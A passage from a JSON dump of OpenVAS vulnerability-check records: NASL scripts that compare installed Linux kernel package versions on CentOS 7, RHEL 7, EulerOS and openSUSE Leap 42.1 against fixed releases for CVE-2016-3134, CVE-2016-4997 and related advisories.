rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-09-20T00:00:00", "id": "OPENVAS:1361412562310882558", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882558", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:1847 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:1847 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882558\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-20 05:41:20 +0200 (Tue, 20 Sep 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:1847 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A security flaw was found in the Linux kernel in the mark_source_chains()\nfunction in 'net/ipv4/netfilter/ip_tables.c'. It is possible for a\nuser-supplied 'ipt_entry' structure to have a large 'next_offset' field.\nThis field is not bounds checked prior to writing to a counter value at the\nsupplied offset. (CVE-2016-3134, Important)\n\n * A flaw was discovered in processing setsockopt for 32 bit processes on 64\nbit systems. This flaw will allow attackers to alter arbitrary kernel\nmemory when unloading a kernel module. This action is usually restricted to\nroot-privileged users but can also be leveraged if the kernel is compiled\nwith CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated\nprivileges. (CVE-2016-4997, Important)\n\n * An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n * In some cases, running the ipmitool command caused a kernel panic due to\na race condition in the ipmi message handler. This update fixes the race\ncondition, and the kernel panic no longer occurs in the described scenario.\n(BZ#1353947)\n\n * Previously, running I/O-intensive operations in some cases caused the\nsystem to terminate unexpectedly after a null pointer dereference in the\nkernel. With this update, a set of patches has been applied to the 3w-9xxx\nand 3w-sas drivers that fix this bug. As a result, the system no longer\ncrashes in the described scenario. (BZ#1362040)\n\n * Previously, the Stream Control Transmission Protocol (SCTP) sockets did\nnot inherit the SELinux labels properly. As a consequence, the sockets were\nlabeled with the unlabeled_t SELinux type which caused SCTP connections to\nfail. The underlying source code has been modified, and SCTP connections\nnow works as expected. (BZ#1354302)\n\n * Previously, the bnx2x driver waited for transmission completions when\nrecovering from a parity event, which substantially increased the recovery\ntime. With this update, bnx2x does not wait for transmission completion in\nthe described circumstances. As a result, the recovery of bnx2x after a\nparity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n * With this update, the audit subsystem enables filtering of processes by\nname besides filtering by PID. Users can now audit by executable name (with\nthe '-F exe= path-to-executabl ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:1847\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-September/022085.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-09-16T00:00:00", "id": "OPENVAS:1361412562310871661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871661", "type": "openvas", "title": "RedHat Update for kernel RHSA-2016:1847-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:1847-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871661\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-16 05:41:00 +0200 (Fri, 16 Sep 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:1847-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel,\n the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A security flaw was found in the Linux kernel in the mark_source_chains()\nfunction in 'net/ipv4/netfilter/ip_tables.c'. It is possible for a\nuser-supplied 'ipt_entry' structure to have a large 'next_offset' field.\nThis field is not bounds checked prior to writing to a counter value at the\nsupplied offset. (CVE-2016-3134, Important)\n\n * A flaw was discovered in processing setsockopt for 32 bit processes on 64\nbit systems. This flaw will allow attackers to alter arbitrary kernel\nmemory when unloading a kernel module. This action is usually restricted to\nroot-privileged users but can also be leveraged if the kernel is compiled\nwith CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated\nprivileges. (CVE-2016-4997, Important)\n\n * An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n * In some cases, running the ipmitool command caused a kernel panic due to\na race condition in the ipmi message handler. This update fixes the race\ncondition, and the kernel panic no longer occurs in the described scenario.\n(BZ#1353947)\n\n * Previously, running I/O-intensive operations in some cases caused the\nsystem to terminate unexpectedly after a null pointer dereference in the\nkernel. With this update, a set of patches has been applied to the 3w-9xxx\nand 3w-sas drivers that fix this bug. As a result, the system no longer\ncrashes in the described scenario. (BZ#1362040)\n\n * Previously, the Stream Control Transmission Protocol (SCTP) sockets did\nnot inherit the SELinux labels properly. As a consequence, the sockets were\nlabeled with the unlabeled_t SELinux type which caused SCTP connections to\nfail. The underlying source code has been modified, and SCTP connections\nnow works as expected. (BZ#1354302)\n\n * Previously, the bnx2x driver waited for transmission completions when\nrecovering from a parity event, which substantially increased the recovery\ntime. With this update, bnx2x does not wait for transmission completion in\nthe described circumstances. As a result, the recovery of bnx2x after a\nparity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n * With this update, the audit subsystem enables filtering of processes by\nname besides filtering by PID. Users can now audit by executable name (with\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:1847-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-September/msg00022.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4794", "CVE-2016-5829", "CVE-2016-4997", "CVE-2016-4470"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-07-15T00:00:00", "id": "OPENVAS:1361412562310851367", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851367", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:1798-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851367\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-15 05:27:52 +0200 (Fri, 15 Jul 2016)\");\n script_cve_id(\"CVE-2016-4470\", \"CVE-2016-4794\", \"CVE-2016-4997\", \"CVE-2016-5829\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:1798-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.1 was updated to 4.1.27 to receive various security\n and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\n\n - CVE-2016-5829: Multiple heap-based buffer overflows in the\n hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux\n kernel allow local users to cause a denial of service or possibly have\n unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2)\n HIDIOCSUSAGES ioctl call (bnc#986572).\n\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bnc#984755).\n\n - CVE-2016-4794: Use-after-free vulnerability in mm/percpu.c in the Linux\n kernel allowed local users to cause a denial of service (BUG)\n or possibly have unspecified other impact via crafted use of the mmap\n and bpf system calls (bnc#980265).\n\n The following non-security bugs were fixed:\n\n - Refresh patches.xen/xen-netback-coalesce: Restore copying of SKBs with\n head exceeding page size (bsc#978469).\n\n - Refresh patches.xen/xen3-patch-2.6.26 (fix PAT initialization).\n\n - Refresh patches.xen/xen3-patch-2.6.39 (fix ia32_compat inheritance).\n\n - Refresh patches.xen/xen3-patch-3.14: Suppress atomic file position\n updates for /proc/xen/xenbus (bsc#970275).\n\n - Refresh patches.xen/xen3-patch-3.16 (drop redundant addition of a\n comment).\n\n - Refresh patches.xen/xen3-patch-4.1.7-8.\n\n - base: make module_create_drivers_dir race-free (bnc#983977).\n\n - ipvs: count pre-established TCP states as active (bsc#970114).\n\n - net: thunderx: Fix TL4 configuration for secondary Qsets (bsc#986530).\n\n - net: thunderx: Fix link status reporting (bsc#986530).\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1798-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv\", rpm:\"kernel-pv~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base\", rpm:\"kernel-pv-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base-debuginfo\", rpm:\"kernel-pv-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debuginfo\", rpm:\"kernel-pv-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debugsource\", rpm:\"kernel-pv-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-devel\", rpm:\"kernel-pv-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa-xen\", rpm:\"kernel-obs-qa-xen~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 